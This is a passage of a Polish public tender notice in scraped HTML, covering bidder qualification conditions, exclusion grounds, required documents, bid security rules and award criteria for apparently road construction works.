utwardzonych i wartości każdegoz zamówień min. 100 000,00 zł brutto. b) dysponuje osobami zdolnymi do wykonania zamówienia- wskaże do uczestniczenia w wykonaniu niniejszego zamówienia następujące osoby wraz zinformacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia,niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynność, orazinformacją o podstawie do dysponowania tymi osobami tj. kierownik robót - niniejsza osoba maposiadać uprawnienia do kierowania robotami budowlanymi w specjalności drogowej bezograniczeń lub odpowiadające im uprawnienia, które zostały wydane na podstawie wcześniejobowiązujących przepisów, a które upoważniają do pełnienia tych funkcji. 2. W przypadkuWykonawców wspólnie ubiegających się o udzielenie zamówienia Zamawiający dokonując ocenyspełnienia warunku udziału w postępowaniu dotyczącego zdolności technicznej lub zawodowej (októrym mowa w pkt 10.1. 2) b) lit. a. SIWZ), uzna warunek za spełniony, jeżeli co najmniej jeden zWykonawców samodzielnie wykaże spełnienie w całości tego warunku. Zamawiający tym samymnie dopuszcza sumowania (łączenia) zasobów dotyczących zdolności technicznej lub zawodowej, októrych mowa w pkt 10. 1. 2) b) lit. a. SIWZ przez 2 lub więcej podmiotów (Wykonawców). Wprzypadku, gdy Wykonawca w celu spełnienia warunku udziału w postępowaniu, dotyczącegozdolności technicznej lub zawodowej (o którym mowa w pkt 10. 1. 2) b) lit. a. SIWZ) polega nazasobach podmiotu trzeciego na zasadach określonych w ustawie, Zamawiający dokonując ocenyspełnienia tego warunku, uzna warunek za spełniony, jeżeli co najmniej jeden z tych podmiotówsamodzielnie wykaże spełnienie w całości tego warunku. Zamawiający tym samym nie dopuszczasumowania (łączenia) zasobów dotyczących zdolności technicznej lub zawodowej (o których mowaw pkt 10.1.2).b) lit. a. SIWZ) przez 2 lub więcej podmiotów. 3. W przypadku, gdy Wykonawcawykazując spełnienie warunku udziału w postępowaniu dotyczącego zdolności technicznej lubzawodowej (o którym mowa w pkt 10.1.2).b) lit. a. SIWZ), polegał będzie na doświadczeniuinnych podmiotów, jedynym sposobem wykorzystania zasobów tych podmiotów (tj. zdolnośćtechniczna lub zawodowa o której mowa w pkt 10.1.2).b) lit. a. SIWZ) jest rzeczywisty udział tychpodmiotów w realizacji zamówienia np. zatrudnienie tych podmiotów do realizacji zamówieniajako podwykonawców lub udział w konsorcjum.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe">1. Wykonawca może w celu potwierdzenia spełniania warunków udziału wpostępowaniu, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jegoczęści, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lubekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nimstosunków prawnych. 2. Zamawiający jednocześnie informuje, iż ,,stosowna sytuacja", o którejmowa w pkt 10.5. SIWZ wystąpi wyłącznie w przypadku kiedy: 1) Wykonawca, który polega nazdolnościach lub sytuacji innych podmiotów, musi udowodnić Zamawiającemu, że realizujączamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególnościprzedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobówna potrzeby realizacji zamówienia. 2) Zamawiający oceni, czy udostępniane wykonawcy przez innepodmioty zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna,pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu orazzbada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, o których mowa w art. 24ust. 1 pkt 13-22 Pzp oraz, o których mowa w pkt 11.1. SIWZ. 3) W odniesieniu do warunkówdotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, Wykonawcy mogąpolegać na zdolnościach innych podmiotów, jeśli podmioty te zrealizują roboty budowlane lubusługi, do realizacji których te zdolności są wymagane. 3. Zamawiający informuje, iż szczegółowewymagania odnośnie niniejszych warunków zawarte są w specyfikacji istotnych warunkówzamówienia zamieszczonej na stronie internetowej Zamawiającego.</span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)</span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">a) Informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21Pzp wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. b)Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że Wykonawca niezalega z opłacaniem podatków, wystawione nie wcześniej niż 3 miesiące przed upływem terminuskładania ofert, lub inny dokument potwierdzający, że Wykonawca zawarł porozumienie zwłaściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkamilub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lubrozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwegoorganu. c) Zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu UbezpieczeńSpołecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentupotwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lubzdrowotne, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lubinny dokument potwierdzający, że Wykonawca zawarł porozumienie z właściwym organem wsprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególnościuzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lubwstrzymanie w całości wykonania decyzji właściwego organu. d) Odpis z właściwego rejestru lub zcentralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagająwpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art.24 ust. 5 pkt 1 Pzp. e) Oświadczenia wykonawcy o braku orzeczenia wobec niego tytułem środkazapobiegawczego zakazu ubiegania się o zamówienia publiczne (wg wzoru stanowiącego Załączniknr 4 do SIWZ). f) Oświadczenia wykonawcy o niezaleganiu z opłacaniem podatków i opłatlokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych(Dz. U. z 2016 r. poz. 716) - wg wzoru stanowiącego Załącznik nr 5 do SIWZ. g) Oświadczeniawykonawcy o braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzjiadministracyjnej o zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczeniaspołeczne lub zdrowotne albo - w przypadku wydania takiego wyroku lub decyzji - dokumentówpotwierdzających dokonanie płatności tych należności wraz z ewentualnymi odsetkami lubgrzywnami lub zawarcie wiążącego porozumienia w sprawie spłat tych należności (wg wzorustanowiącego Załącznik nr 6 do SIWZ). Uwaga: Obowiązek złożenia niniejszego oświadczeniapowstaje w przypadku, gdy z treści zaświadczeń z US/ZUS będzie wynikać istnienie zaległości.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">a) Wykaz robót budowlanych (wg wzoru stanowiącego Załącznik nr 7 do SIWZ) wykonanych niewcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okresprowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty,miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniemdowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególnościinformacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego iprawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumentywystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli zuzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tychdokumentów - inne dokumenty. Jeżeli wykaz lub inne złożone przez Wykonawcę dokumentybudzą wątpliwości Zamawiającego, może on zwrócić się bezpośrednio do właściwego podmiotu, narzecz którego roboty budowlane były wykonane, a w przypadku świadczeń okresowych lubciągłych są wykonywane, o dodatkowe informacje lub dokumenty w tym zakresie. b) Wykaz osób(wg wzoru stanowiącego Załącznik nr 8 do SIWZ) skierowanych przez Wykonawcę do realizacjizamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolęjakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacjizawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówieniapublicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie dodysponowania tymi osobami. c) Część sprawozdania finansowego w postaci rachunku zysków istrat, w przypadku gdy sporządzenie sprawozdania wymagane jest przepisami prawa kraju, wktórym Wykonawca ma siedzibę lub miejsce zamieszkania, a jeżeli podlega ono badaniu przezbiegłego rewidenta zgodnie z przepisami o rachunkowości, również odpowiednio z opinią obadanym sprawozdaniu albo jego części, a w przypadku Wykonawców niezobowiązanych dosporządzenia sprawozdania finansowego, innych dokumentów określających obroty - za okres niedłuższy niż ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za tenokres - co najmniej w wymaganej wysokości. d) Informacja banku lub spółdzielczej kasyoszczędnościowo-kredytowej potwierdzająca wysokość posiadanych środków finansowych lubzdolność kredytową Wykonawcy, w okresie nie wcześniejszym niż 1 miesiąc przed upływemterminu składania ofert - co najmniej w wymaganej wysokości. e) Dokument potwierdzający, żeWykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalnościzwiązanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez Zamawiającego.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1. Do oferty (Formularz stanowiący Załącznik nr 1 do SIWZ) każdy Wykonawca dołącza aktualnena dzień składania ofert oświadczenie w zakresie wskazanym w Załączniku nr 2 do SIWZ.Informacje zawarte w oświadczeniu będą stanowić wstępne potwierdzenie, że Wykonawca niepodlega wykluczeniu oraz spełnia warunki udziału w postępowaniu. 2. Wykonawca, którypowołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstawwykluczenia oraz spełnienia, w zakresie, w jakim powołuje się na ich zasoby warunków udziału wpostępowaniu zamieszcza informacje o tych podmiotach w oświadczeniu, o którym mowa w pkt12.1.1) SIWZ. 3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawcówoświadczenie, o którym mowa w pkt 12.1.1) SIWZ składa każdy z Wykonawców wspólnieubiegających się o zamówienie. Oświadczenie ma potwierdzać spełnianie warunków udziału wpostępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawcówwykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia.4.Zamawiający przed udzieleniem zamówienia, wezwie Wykonawcę, którego oferta zostałanajwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych nadzień złożenia oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art.25 ust. 1 Pzp. 5. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: 1) nie podlegająwykluczeniu w przypadkach wskazanych w art. 24 ust. 1 pkt 13-23 Pzp oraz w przypadkachwskazanych w art. 24 ust. 5 pkt 1 i 8 Pzp. 2)spełniają warunki udziału w postępowaniu dotyczące:a) Sytuacji ekonomicznej i finansowej b) zdolności technicznej lub zawodowej 6. Zamawiającyżąda od Wykonawcy, który polega na zdolnościach lub sytuacji innych podmiotów na zasadachokreślonych w art. 22a Pzp, przedstawienia w odniesieniu do tych podmiotów dokumentów ioświadczeń wskazanych w pkt 12.2.2) SIWZ potwierdzających brak podstaw wykluczenia orazodpowiednich dokumentów wskazanych w pkt 12.2.1) SIWZ potwierdzających spełnianie, wzakresie, w jakim powołuje się Wykonawca na ich zasoby, warunków udziału w postępowaniu. 7.Wykonawcy mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiejskładają dokumenty zgodnie z przepisami rozporządzenia wykonawczego do ustawy Prawozamówień publicznych w sprawie rodzajów dokumentów, jakich może żądać Zamawiający odWykonawcy w postępowaniu o udzielenie zamówienia (Rozporządzenie Ministra Rozwoju z dnia26 lipca 2016 roku Dz. U. z 2016 r., poz. 1126). 8. Wykonawcy wspólnie ubiegający się oudzielenie niniejszego zamówienia mogą łącznie spełniać warunki udziału w postępowaniu orazzłożyć dokumenty potwierdzające spełnianie tych warunków zgodnie z zapisami zawartymi wSIWZ, z zastrzeżeniem pkt 10.2 SIWZ (dotyczy warunku zdolności technicznej lub zawodowej, októrym mowa w pkt 10.1.2).b) lit. a. SIWZ). Dokumenty wymienione w pkt 12.2.2) SIWZ składakażdy z Wykonawców wspólnie ubiegających się o zamówienie. Ponadto tacy Wykonawcyustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu alboreprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.Zaleca się aby Pełnomocnikiem był jeden z Wykonawców wspólnie ubiegających się o udzieleniezamówienia. Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">1. Wysokość wadium. 1) Każdy Wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium wwysokości 3 000,00 zł [słownie: trzy tysiące złotych] 2. Forma wadium. 1) Wadium może byćwniesione w następujących formach: a) Pieniądzu; b) poręczeniach bankowych lub poręczeniachspółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniempieniężnym; c) gwarancjach bankowych; d) gwarancjach ubezpieczeniowych; e) poręczeniachudzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity Dz. U. z 2016 r., poz.359). 2) W przypadku składania przez Wykonawcę wadium w formie gwarancji / poręczenia,gwarancja / poręczenie powinna być sporządzona zgodnie z obowiązującym prawem i winnazawierać następujące elementy: a) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji /poręczenia (Zamawiającego), gwaranta / poręczyciela (banku lub instytucji ubezpieczeniowejudzielających gwarancji) oraz wskazanie ich siedzib, b) określenie wierzytelności, która ma byćzabezpieczona gwarancją / poręczeniem, c) kwotę gwarancji / poręczenia, d) termin ważnościgwarancji / poręczenia, e) bezwarunkowe zobowiązanie gwaranta / poręczyciela do: ,,zapłaceniakwoty gwarancji / poręczenia na pierwsze pisemne żądanie Zamawiającego zawierająceoświadczenie, iż Wykonawca, którego oferta została wybrana: a. odmówił podpisania umowy nawarunkach określonych w ofercie, lub b. nie wniósł zabezpieczenia należytego wykonania umowy,lub c. zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy, lub d.Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3a, Pzp z przyczynleżących po jego stronie, nie złożył oświadczeń lub dokumentów potwierdzających okoliczności, októrych mowa w art. 25 ust. 1 Pzp, oświadczenia, o którym mowa w art. 25a ust. 1 Pzp,pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3Pzp, co spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jakonajkorzystniejszej. 3) Zamawiający nie dopuszcza wniesienia (nie uzna za wniesione) wadium wformie gwarancji ubezpieczeniowej wystawionej przez UNIQA Towarzystwo Ubezpieczeń SpółkaAkcyjna. Zamawiający odrzuci ofertę Wykonawcy, który wniósł wadium w sposób, o którymmowa w zdaniu poprzednim. Przyczyną wyłączenia z kręgu gwarantów wskazanego podmiotu jestspór sądowy zawisły na tle odmowy spełnienia świadczenia gwarancyjnego przez wymienioneTowarzystwo Ubezpieczeniowe, mimo dopełnienia przez Zamawiającego wszelkich wymogówformalnych. Z uwagi na powyższe, istnieje uzasadniona obawa Zamawiającego, iż gwarancjeubezpieczeniowe wystawiane przez ww. Towarzystwo nie spełni swej roli wynikającej z przepisówustawy Prawo zamówień publicznych oraz Kodeks cywilny. 3. Miejsce i sposób wniesieniawadium. 1) Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunekbankowy Zamawiającego: Bank Ochrony Środowiska II Oddział Warszawa 95 1540 1157 20016680 8633 0003 2) Wadium wnoszone w innych dopuszczonych przez Zamawiającego formachnależy złożyć w formie oryginału w siedzibie Zamawiającego w pok. nr 14 (sekretariat). Nie należyzałączać oryginału dokumentu wadialnego do oferty. 4. Termin wniesienia wadium. Wadium należywnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu zapomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdyznajdzie się na rachunku Zamawiającego przed upływem terminu składania ofert. 5. Zwrot wadium.Zamawiający zwróci niezwłocznie wadium według zasad określonych w art. 46 Pzp. 6. Utratawadium. 1) Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzina wezwanie, o którym mowa w art. 26 ust. 3 i 3a Pzp, z przyczyn leżących po jego stronie, niezłożył oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust.1 Pzp, oświadczenia, o którym mowa w art. 25a ust. 1 Pzp, pełnomocnictw lub nie wyraził zgodyna poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 Pzp, co spowodowało brak możliwościwybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej. 2) Zamawiający zatrzymujewadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana: a) odmówiłpodpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; b) niewniósł wymaganego zabezpieczenia należytego wykonania umowy; c) zawarcie umowy w sprawiezamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie">Nie</span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>90,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Termin wykonania</TD><TD style='border: 1px solid black;border-collapse: collapse;'>10,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span 